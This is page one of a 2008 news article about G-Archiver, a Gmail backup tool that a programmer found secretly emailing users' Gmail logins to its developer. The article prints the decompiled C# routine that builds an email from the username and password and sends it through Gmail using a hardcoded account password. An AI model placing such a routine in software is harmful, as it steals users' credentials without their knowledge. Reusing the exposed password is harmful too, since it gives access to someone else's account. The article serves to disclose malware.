TAG | Trojan steals Gmail passwords – and charges for it |
|
| by David M Williams | |
| Wednesday, 12 March 2008 | |
|
Page 1 of 3   
Featured Whitepaper
5 Best Practices for Smartphone Support
Brooks, it transpires, wanted to back up his Gmail account to a local drive. That's an understandable need; with mail storage in the order of gigabytes Gmail is a boon to hoarders and road warriors everywhere. You needn't even constrain yourself to e-mail: utilities exist to let you make use of all that lovely Google-provided disk space as a virtual hard drive. So, Brooks had a bunch of stuff in his Gmail account that he didn't want to lose. He came across G-Archiver, a tool designed specifically for this very purpose which retails for $US 29.95 and offers a free trial. Brooks duly downloaded the software and gave it a spin. It prompted for his Gmail login details and he handed them over. G-Archiver performed its basic task but didn't quite do what Brooks would have liked. Not to worry, being a computer programmer himself he used Lutz Roeder's well-known Reflector software to do a bit of reverse engineering. Now, ordinarily trying to figure out someone else's proprietary source code is ethically dodgy, if not illegal. However, what Brooks discovered completely overshadowed any such concerns. A Gmail user, undoubtedly part of the G-Archiver development team, if not the author himself, called John Terry had hardcoded their Gmail username and password into the source code. And then he noticed every time a user ran G-Archiver and added a new Gmail account the program would e-mail these credentials to John Terry's mailbox! This very code was clearly visible within the file SM.dll installed by the software: public static void CheckConnection(string a, string b) { try { MailMessage message = new MailMessage(); message.To.Add(" This e-mail address is being protected from spam bots, you need JavaScript enabled to view it "); message.From = new MailAddress(" This e-mail address is being protected from spam bots, you need JavaScript enabled to view it ", "JTerry", Encoding.UTF8); message.Subject = "Account"; message.SubjectEncoding = Encoding.UTF8; message.Body = "Username: " + a; message.Body = message.Body + "\r\nPassword: " + b; message.BodyEncoding = Encoding.UTF8; message.IsBodyHtml = false; message.Priority = MailPriority.High; SmtpClient client = new SmtpClient(); client.Credentials = new NetworkCredential(" This e-mail address is being protected from spam bots, you need JavaScript enabled to view it ", "bilal482"); client.Port = 0x24b; client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Send(message); } catch (Exception) { } } The key lines to note are the ones which begin with message.Body; here an e-mail message is built up with the literal strings "Username:" and "Password:" followed by the user's username and password as passed in to the function. The code sends this message through Gmail to the address This e-mail address is being protected from spam bots, you need JavaScript enabled to view it using that very account with password bilal482. Brooks was concerned; after all, he'd just typed in his own login details! He fired up his web browser, called up Gmail and logged in to John Terry's account with the username and password contained within the bowels of G-Archiver. What he saw stunned him again. Please read on to find out what happened. CONTINUED |
| < Next story in category | Previous story in the category > |
|---|
